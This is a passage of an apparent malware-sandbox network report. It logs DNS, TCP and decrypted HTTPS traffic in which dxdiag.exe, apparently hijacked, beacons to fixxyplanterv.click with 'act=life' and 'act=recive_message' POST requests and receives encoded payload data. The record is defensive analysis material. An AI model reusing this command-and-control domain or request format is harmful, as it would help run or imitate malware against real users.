Jan 13, 2025 08:29:15.664336920 CET	49734	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.664369106 CET	443	49734	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.857145071 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.857243061 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:15.857340097 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.857996941 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:15.858023882 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.338269949 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.338515997 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.341347933 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.341378927 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.341660976 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.343000889 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.343000889 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.343056917 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.346216917 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.346232891 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.950666904 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.950900078 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:16.951128960 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.951589108 CET	49741	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:16.951636076 CET	443	49741	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:17.534223080 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:17.534266949 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:17.534581900 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:17.535042048 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:17.535064936 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.003869057 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.004044056 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.005434990 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.005445957 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.005676031 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.006953001 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.007076025 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.007081985 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.433442116 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.433532953 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:18.433634043 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.433866978 CET	49753	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:18.433883905 CET	443	49753	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.123059034 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.123100996 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.123168945 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.123440027 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.123454094 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.579116106 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.579194069 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.580421925 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.580440044 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.580666065 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.605319023 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606126070 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606154919 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606240988 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606267929 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606369019 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606440067 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606543064 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606568098 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606698990 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606734037 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606899977 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.606930017 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.606941938 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.607076883 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.607108116 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616265059 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.616427898 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616458893 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.616482973 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616497993 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.616508007 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616518974 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616611958 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616646051 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.616674900 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.621570110 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:19.621612072 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:19.663327932 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.079972982 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.080224991 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.080373049 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.080517054 CET	49765	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.080562115 CET	443	49765	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.145860910 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.145896912 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.145956039 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.146318913 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.146331072 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.624165058 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.624274015 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.627994061 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.628000021 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.628423929 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.629937887 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.629956961 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.630019903 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.949625015 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.949870110 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.949928999 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.950061083 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.950071096 CET	443	49781	172.67.134.197	192.168.2.6
Jan 13, 2025 08:29:21.950082064 CET	49781	443	192.168.2.6	172.67.134.197
Jan 13, 2025 08:29:21.950086117 CET	443	49781	172.67.134.197	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 08:29:11.004713058 CET	63323	53	192.168.2.6	1.1.1.1
Jan 13, 2025 08:29:11.027338028 CET	53	63323	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 08:29:11.004713058 CET	192.168.2.6	1.1.1.1	0xb2b9	Standard query (0)	fixxyplanterv.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 08:29:11.027338028 CET	1.1.1.1	192.168.2.6	0xb2b9	No error (0)	fixxyplanterv.click		172.67.134.197	A (IP address)	IN (0x0001)	false
Jan 13, 2025 08:29:11.027338028 CET	1.1.1.1	192.168.2.6	0xb2b9	No error (0)	fixxyplanterv.click		104.21.6.116	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fixxyplanterv.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:11 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fixxyplanterv.click
2025-01-13 07:29:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-13 07:29:12 UTC	1121	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3docd0ddklt4ss9natk6ettcbj; expires=Fri, 09 May 2025 01:15:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBTPRYrXc6UIxLXQpZiHIgOip3pmM3r6fXLKPfX5ejtImo6S5eiUBxZ7VWimqJK8qL6XRZ3wYxrF%2FlpsbbzdICMrmQY23UmnO6e31vsaq3EvMenkR6hXOY62WEeFUEvwlR6yJ6zf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013ac81089242b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2517&rtt_var=955&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1138845&cwnd=191&unsent_bytes=0&cid=6a713fd0acf51105&ts=681&x=0"
2025-01-13 07:29:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-13 07:29:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:12 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: fixxyplanterv.click
2025-01-13 07:29:12 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
2025-01-13 07:29:13 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i7knjm0pre9e727h7465993m81; expires=Fri, 09 May 2025 01:15:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gWunH5TjMAfnji%2FsX%2B40KusnNwEe1oqcjByho%2BMOkVy2cb48WfcKAPwp3SdzJCvt8ypL3xeODJhaOWivH8HIlZPP%2F1r5YfvLE4xBzTNOdDNB4v12mDjqmby3OOj7tTFWKo8sTclB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013ac87580f0f7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1627&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=1776155&cwnd=205&unsent_bytes=0&cid=9ac3f58ea6eadab4&ts=517&x=0"
2025-01-13 07:29:13 UTC	242	IN	Data Raw: 31 63 62 62 0d 0a 67 4f 43 55 52 57 41 47 34 32 2f 42 49 55 78 58 30 50 46 55 59 45 53 46 62 42 44 2b 49 37 4f 56 47 59 6e 45 6b 70 64 65 2f 62 66 37 77 75 4a 6e 57 6a 4c 50 54 62 4a 45 62 6d 32 6b 67 79 45 46 61 4b 63 4e 64 4e 77 5a 31 66 52 31 2b 71 47 2b 74 53 69 51 6c 62 71 47 39 53 6b 54 59 38 39 4e 70 46 6c 75 62 59 75 4b 64 67 55 71 70 31 59 79 6d 30 6e 52 39 48 58 72 70 66 6e 34 4c 70 48 55 36 49 7a 7a 4c 51 56 6c 68 77 36 74 54 43 6b 79 74 5a 41 2b 44 69 33 6f 42 48 33 63 44 35 48 77 59 36 76 2b 73 4e 6f 37 69 64 62 4e 67 65 63 75 51 6e 76 50 46 4f 4e 45 49 6e 58 71 30 7a 55 46 4a 75 6b 4b 64 4a 56 4c 32 2f 31 39 36 71 44 34 35 7a 65 62 33 2b 69 43 38 43 77 50 62 4a 4d 44 70 30 73 69 4e 4c 2b 51 64 6b 78 6d Data Ascii: 1cbbgOCURWAG42/BIUxX0PFUYESFbBD+I7OVGYnEkpde/bf7wuJnWjLPTbJEbm2kgyEFaKcNdNwZ1fR1+qG+tSiQlbqG9SkTY89NpFlubYuKdgUqp1Yym0nR9HXrpfn4LpHU6IzzLQVlhw6tTCkytZA+Di3oBH3cD5HwY6v+sNo7idbNgecuQnvPFONEInXq0zUFJukKdJVL2/196qD45zeb3+iC8CwPbJMDp0siNL+Qdkxm
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 34 42 59 79 78 41 47 43 78 58 6a 36 74 2b 58 34 4c 4a 6d 56 2f 63 7a 76 5a 77 56 6f 77 56 58 6a 53 79 49 37 74 35 41 35 42 53 66 6e 48 48 32 63 51 74 6e 2f 66 2b 47 70 2f 2f 6f 79 6c 64 4c 71 69 2f 45 6f 42 57 79 48 41 71 41 44 59 48 57 31 69 33 5a 61 5a 73 63 65 63 5a 39 56 33 4f 59 37 39 4f 6a 70 74 54 75 54 6c 62 72 43 38 43 6b 44 61 59 45 66 71 30 67 6c 4d 4b 43 59 50 77 38 72 35 77 4e 34 6b 30 4c 52 38 48 48 68 71 66 72 78 4d 5a 4c 54 34 6f 4b 32 61 55 4a 6a 6d 55 33 37 41 77 30 77 6f 70 51 36 46 47 54 64 54 6d 33 53 57 4a 48 77 64 36 76 2b 73 50 30 35 6e 4e 62 70 6a 66 55 76 43 58 61 42 48 36 56 4f 4b 79 65 30 6c 6a 67 49 4a 66 55 45 66 4a 70 43 32 50 78 79 37 71 48 30 74 58 4c 66 30 76 72 43 72 6d 63 6a 61 59 6f 42 71 56 51 75 64 61 33 64 4c 30 49 Data Ascii: 4BYyxAGCxXj6t+X4LJmV/czvZwVowVXjSyI7t5A5BSfnHH2cQtn/f+Gp//oyldLqi/EoBWyHAqADYHW1i3ZaZscecZ9V3OY79OjptTuTlbrC8CkDaYEfq0glMKCYPw8r5wN4k0LR8HHhqfrxMZLT4oK2aUJjmU37Aw0wopQ6FGTdTm3SWJHwd6v+sP05nNbpjfUvCXaBH6VOKye0ljgIJfUEfJpC2Pxy7qH0tXLf0vrCrmcjaYoBqVQuda3dL0I
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 4a 70 4f 33 50 73 37 70 65 62 33 37 58 7a 48 6c 63 69 42 34 69 51 49 4a 72 51 4f 72 55 30 70 49 2f 4b 4d 65 42 74 6d 34 41 49 79 78 41 48 63 39 6e 50 74 74 50 2f 34 50 35 48 62 37 59 66 35 4c 77 4a 6b 6a 41 69 6e 53 43 55 32 76 35 63 6b 43 43 62 76 43 33 4f 57 53 35 47 35 4f 2b 79 2b 73 4b 31 38 72 73 4c 70 77 4d 4d 6b 44 47 71 47 47 2b 4e 63 59 43 7a 79 6c 44 70 43 66 71 63 44 65 70 6c 45 33 76 5a 78 35 61 50 36 2b 54 53 52 31 76 43 4e 38 69 63 4f 62 49 73 41 72 55 63 6d 50 4c 6d 59 4d 41 49 6e 37 55 34 38 33 45 62 4a 74 79 4f 72 6b 76 66 35 4d 5a 43 58 31 34 48 34 4b 51 56 79 77 52 4c 74 57 6d 34 79 76 74 4e 75 51 69 72 75 44 6e 6d 57 52 64 48 77 64 75 36 6c 39 2f 59 78 6d 4e 2f 73 68 66 49 72 43 32 6d 48 44 61 52 48 4b 79 65 33 6d 6a 6f 4f 5a 71 6c 4f Data Ascii: JpO3Ps7peb37XzHlciB4iQIJrQOrU0pI/KMeBtm4AIyxAHc9nPttP/4P5Hb7Yf5LwJkjAinSCU2v5ckCCbvC3OWS5G5O+y+sK18rsLpwMMkDGqGG+NcYCzylDpCfqcDeplE3vZx5aP6+TSR1vCN8icObIsArUcmPLmYMAIn7U483EbJtyOrkvf5MZCX14H4KQVywRLtWm4yvtNuQiruDnmWRdHwdu6l9/YxmN/shfIrC2mHDaRHKye3mjoOZqlO
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 2f 75 4f 2b 79 71 73 4b 31 38 6c 74 7a 77 6a 50 67 75 44 32 4b 4a 43 71 31 4f 4a 54 4f 35 6c 44 45 45 4b 2b 38 44 64 35 39 41 31 66 31 70 36 4b 33 36 2b 44 62 66 6d 36 4b 46 37 6d 64 61 4a 4b 59 42 69 6c 4d 31 4a 36 54 54 4b 55 77 2f 70 77 6c 2b 33 42 6d 52 39 48 54 69 71 66 6a 39 4d 35 44 52 37 49 54 77 4b 67 64 72 69 78 2b 72 54 53 4d 2b 76 5a 67 6b 41 69 76 6a 41 6e 61 55 53 74 75 33 4e 61 75 68 36 4c 56 6b 33 2b 44 76 6a 66 59 6b 46 43 53 65 51 37 6f 44 4b 54 6e 79 79 33 59 4f 4b 4f 63 42 66 70 42 4b 32 66 5a 33 35 61 48 31 2f 44 53 58 78 2b 4f 47 2f 69 59 4d 61 34 41 4a 70 6b 59 71 4d 72 61 56 4f 55 4a 6f 70 77 6c 71 33 42 6d 52 32 46 7a 65 35 4e 48 50 66 49 43 62 2b 38 4c 78 4b 30 49 38 77 51 47 67 54 79 59 36 74 4a 6f 36 43 43 2f 73 41 6e 6d 59 54 Data Ascii: /uO+yqsK18ltzwjPguD2KJCq1OJTO5lDEEK+8Dd59A1f1p6K36+Dbfm6KF7mdaJKYBilM1J6TTKUw/pwl+3BmR9HTiqfj9M5DR7ITwKgdrix+rTSM+vZgkAivjAnaUStu3Nauh6LVk3+DvjfYkFCSeQ7oDKTnyy3YOKOcBfpBK2fZ35aH1/DSXx+OG/iYMa4AJpkYqMraVOUJopwlq3BmR2Fze5NHPfICb+8LxK0I8wQGgTyY6tJo6CC/sAnmYT
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 6b 70 2f 48 7a 4c 70 6a 63 38 49 7a 37 4b 41 70 73 69 41 79 6e 52 69 4d 7a 76 70 6b 33 42 53 6a 70 42 6a 4c 53 41 64 62 76 4f 37 50 6d 30 65 55 6e 6a 63 50 76 6f 2f 73 6f 51 6e 76 50 46 4f 4e 45 49 6e 58 71 30 7a 38 51 49 75 6f 63 65 35 74 50 33 76 52 70 36 71 76 37 35 7a 75 51 30 65 57 4f 38 43 67 45 5a 59 51 48 72 30 51 72 50 72 32 66 64 6b 78 6d 34 42 59 79 78 41 48 2f 2f 47 6a 38 70 66 37 2b 4b 6f 53 56 2f 63 7a 76 5a 77 56 6f 77 56 58 6a 51 43 55 2b 74 70 4d 36 41 69 4c 71 44 6d 43 54 52 74 62 2b 63 50 6d 73 39 2f 49 33 6c 39 37 74 68 4f 51 72 44 48 61 45 48 37 45 44 59 48 57 31 69 33 5a 61 5a 74 45 4a 59 6f 78 43 6b 38 5a 74 36 4c 44 37 2b 44 44 66 79 71 79 62 74 69 41 4f 4a 4e 6c 4e 70 55 77 6e 4e 72 32 53 50 77 34 72 34 67 64 33 6e 55 66 56 2f 58 Data Ascii: kp/HzLpjc8Iz7KApsiAynRiMzvpk3BSjpBjLSAdbvO7Pm0eUnjcPvo/soQnvPFONEInXq0z8QIuoce5tP3vRp6qv75zuQ0eWO8CgEZYQHr0QrPr2fdkxm4BYyxAH//Gj8pf7+KoSV/czvZwVowVXjQCU+tpM6AiLqDmCTRtb+cPms9/I3l97thOQrDHaEH7EDYHW1i3ZaZtEJYoxCk8Zt6LD7+DDfyqybtiAOJNlNpUwnNr2SPw4r4gd3nUfV/X
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 74 53 50 52 7a 4b 4b 46 2b 6d 64 61 4a 49 49 4b 6f 45 49 6b 50 4c 36 63 4d 51 59 30 37 51 6c 67 6e 55 44 61 2b 6e 66 72 71 2f 33 2f 50 5a 62 59 37 6f 2f 78 49 41 31 68 77 55 50 6a 52 44 5a 31 36 74 4d 58 44 79 33 72 56 53 6a 63 58 70 2f 75 4f 2b 79 71 73 4b 31 38 6e 39 2f 6e 69 50 73 6b 44 57 65 54 44 4b 56 52 4c 6a 69 34 67 54 77 4a 49 2b 6f 44 66 35 39 48 31 2f 78 33 2b 61 2f 77 39 6a 66 66 6d 36 4b 46 37 6d 64 61 4a 4b 49 61 74 55 6b 70 4f 61 53 59 4e 77 45 77 36 68 34 79 30 67 48 41 38 47 71 72 2f 75 62 6c 4b 35 6a 4b 72 4a 75 32 49 41 34 6b 32 55 32 6c 53 69 67 79 74 4a 30 6b 42 79 44 6f 41 58 75 56 52 64 6e 30 65 2b 2b 69 39 2f 41 2f 6b 39 37 6c 67 66 6b 6a 43 32 71 49 41 75 4d 4e 62 6a 4b 71 30 32 35 43 42 2f 77 4e 66 70 45 42 7a 72 6c 69 71 36 48 Data Ascii: tSPRzKKF+mdaJIIKoEIkPL6cMQY07QlgnUDa+nfrq/3/PZbY7o/xIA1hwUPjRDZ16tMXDy3rVSjcXp/uO+yqsK18n9/niPskDWeTDKVRLji4gTwJI+oDf59H1/x3+a/w9jffm6KF7mdaJKIatUkpOaSYNwEw6h4y0gHA8Gqr/ublK5jKrJu2IA4k2U2lSigytJ0kByDoAXuVRdn0e++i9/A/k97lgfkjC2qIAuMNbjKq025CB/wNfpEBzrliq6H
2025-01-13 07:29:13 UTC	276	IN	Data Raw: 35 57 36 77 74 59 73 46 47 47 47 47 2b 46 32 4c 54 75 38 6c 43 42 43 4f 64 68 41 4d 70 4e 62 6b 61 39 43 38 75 62 33 2b 58 7a 48 6c 66 65 46 39 69 41 59 63 6f 59 42 73 6b 67 6a 4f 5a 43 63 4d 52 51 6c 36 41 31 6a 6c 51 33 61 2b 6a 75 6c 35 76 66 74 66 4d 65 56 7a 59 58 67 4a 43 31 6e 6b 41 54 6a 44 57 34 79 70 4e 4e 75 51 68 69 6e 48 48 47 4d 51 74 37 6d 52 61 76 2b 36 63 74 38 6c 4d 50 6c 6b 76 55 78 43 57 6d 4e 48 4a 30 44 64 6d 48 67 77 57 52 51 64 50 68 4f 62 61 4d 50 6b 66 59 37 73 35 2f 70 74 53 72 66 6a 62 44 4d 74 6a 56 43 50 4d 46 4b 6f 46 45 38 4d 37 47 46 4e 55 55 59 32 53 6c 6b 6c 6b 62 42 38 47 7a 6b 35 72 36 31 4d 39 2b 4e 32 38 4c 2f 49 42 6c 31 6c 77 43 7a 52 47 34 4b 2f 4e 4d 75 51 6e 36 6e 4f 33 47 53 54 39 62 68 61 71 61 42 35 76 38 37 Data Ascii: 5W6wtYsFGGGG+F2LTu8lCBCOdhAMpNbka9C8ub3+XzHlfeF9iAYcoYBskgjOZCcMRQl6A1jlQ3a+jul5vftfMeVzYXgJC1nkATjDW4ypNNuQhinHHGMQt7mRav+6ct8lMPlkvUxCWmNHJ0DdmHgwWRQdPhObaMPkfY7s5/ptSrfjbDMtjVCPMFKoFE8M7GFNUUY2SlklkbB8Gzk5r61M9+N28L/IBl1lwCzRG4K/NMuQn6nO3GST9bhaqaB5v87
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 32 63 64 39 0d 0a 6a 30 32 35 53 64 4c 78 62 49 63 73 52 67 2b 67 31 38 75 62 6d 74 57 54 4e 6d 36 4b 51 74 6e 39 43 49 34 49 66 73 55 55 74 49 37 48 55 43 44 77 42 2f 51 4e 30 69 31 44 76 79 58 7a 78 71 2f 62 69 4c 64 50 41 34 59 7a 34 49 42 51 6b 7a 30 32 73 41 33 59 4d 38 74 74 32 50 57 69 6e 46 6a 4c 45 41 65 54 30 64 65 57 68 35 75 52 78 75 4d 2f 76 68 4f 45 32 51 69 72 42 43 2b 4d 62 66 48 76 79 6c 79 64 43 66 72 64 63 4b 63 6b 53 68 71 63 70 39 4f 6a 70 74 53 72 66 6a 62 44 4d 74 6a 56 43 50 4d 46 4b 6f 46 45 38 4d 37 47 46 4e 55 55 59 32 53 42 31 6d 6b 54 57 35 7a 6e 46 72 65 54 79 66 4e 47 56 37 63 4b 75 48 6b 49 73 77 54 4c 74 41 7a 5a 31 36 74 4d 44 41 53 6a 70 43 57 53 4e 44 50 2f 77 66 65 36 68 34 4c 63 53 6c 4d 48 6c 77 72 68 6e 42 43 54 5a Data Ascii: 2cd9j025SdLxbIcsRg+g18ubmtWTNm6KQtn9CI4IfsUUtI7HUCDwB/QN0i1DvyXzxq/biLdPA4Yz4IBQkz02sA3YM8tt2PWinFjLEAeT0deWh5uRxuM/vhOE2QirBC+MbfHvylydCfrdcKckShqcp9OjptSrfjbDMtjVCPMFKoFE8M7GFNUUY2SB1mkTW5znFreTyfNGV7cKuHkIswTLtAzZ16tMDASjpCWSNDP/wfe6h4LcSlMHlwrhnBCTZ
2025-01-13 07:29:13 UTC	1369	IN	Data Raw: 6b 4c 6a 4c 51 34 42 53 66 78 48 6d 57 54 66 2b 2f 69 65 4f 57 6f 39 2b 4d 74 33 35 75 69 6a 62 5a 2f 4f 79 54 4a 54 5a 77 4e 62 69 33 79 79 33 59 33 4a 65 6b 41 64 59 70 51 6e 4e 42 31 37 4b 66 6d 35 53 75 51 6c 61 7a 43 38 47 64 61 4e 73 39 4e 70 31 4a 75 62 65 4c 42 62 56 64 31 73 46 34 67 67 77 2f 49 74 32 32 72 2f 71 4b 37 66 49 32 56 75 73 4b 78 4a 42 42 32 68 77 36 31 51 47 6b 4c 6a 4c 51 34 42 53 66 78 48 6d 57 54 44 76 2f 42 57 74 57 59 35 66 59 79 6b 64 4c 30 6b 37 5a 70 51 6d 76 42 56 5a 6f 44 5a 6e 57 4e 33 58 59 61 5a 72 39 4f 52 35 39 50 33 2f 42 74 2b 75 76 58 2b 7a 75 65 77 2f 4b 56 2b 57 67 73 55 71 42 4e 37 51 4d 6f 64 65 72 42 65 45 49 69 39 6b 34 71 7a 42 4f 4b 6f 69 69 38 39 71 4c 71 63 6f 61 56 39 4d 4b 75 64 55 77 6b 6b 30 33 37 41 Data Ascii: 